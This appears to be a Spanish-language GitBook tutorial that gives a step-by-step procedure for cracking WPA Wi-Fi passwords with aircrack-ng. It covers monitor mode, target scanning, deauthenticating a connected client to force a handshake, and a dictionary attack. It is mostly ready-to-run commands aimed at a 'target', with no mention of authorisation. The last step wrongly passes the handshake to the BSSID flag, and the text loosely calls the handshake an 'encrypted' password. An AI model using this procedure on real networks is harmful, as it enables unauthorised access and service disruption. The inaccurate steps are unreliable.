# AirCrack NG

*Previamente se debió instalar aircrack-ng con `sudo apt install aircrack-ng`*

{% stepper %}
{% step %}

### Buscar la interfaz

Buscar la interfaz de tu red wifi con `ifconfig` o `ip a`.
{% endstep %}

{% step %}

### Iniciar tu interfaz en modo monitor

```sh
sudo airmon-ng start <interface>
```

{% endstep %}

{% step %}

### Enumerar redes wifi

```sh
sudo airodump-ng <interface>
```

De este escaneo, para el objetivo debemos guardar la información del `BSSID` y del `CH` (canal).
{% endstep %}

{% step %}

### Interceptar la estación

```sh
sudo airodump-ng -c <CH> --bssid <BSSID> -w output.txt <interface>
```

De este otro escaneo vamos a querer la `STATION` para proceder con el envío del tráfico deauth y así obtener el `handshake`.
{% endstep %}

{% step %}

### Obtención del `handshake` (apretón de manos)

```sh
sudo aireplay-ng -0 9 -a <BSSID> -c <STATION> <interface>
```

Ahora que ya expulsamos al usuario y lo forzamos a reintentar la contraseña, obtenemos el `handshake`.

{% hint style="info" %}
Se recomienda repetir este paso unas 3-4 veces en caso de no obtener el handshake.
{% endhint %}
{% endstep %}

{% step %}

### Obtención de contraseña (ataque por diccionario)

Previo a todo ello ya procederemos a obtener la contraseña pero en forma encriptada, para que con `aircrack-ng` mediante fuerza bruta de diccionario podamos descifrarla:

```sh
sudo aircrack-ng -b <HANDSHAKE> -w <dictionary.txt> <file.cap>
```

{% endstep %}
{% endstepper %}

{% hint style="warning" %}
Al querer obtener el handshake se debieron generar archivos de diferentes índoles como: `*.cap`, `*.csv`, `*.netxml`. En caso de no ser así, volver a intentar todos los comandos previos en orden.
{% endhint %}
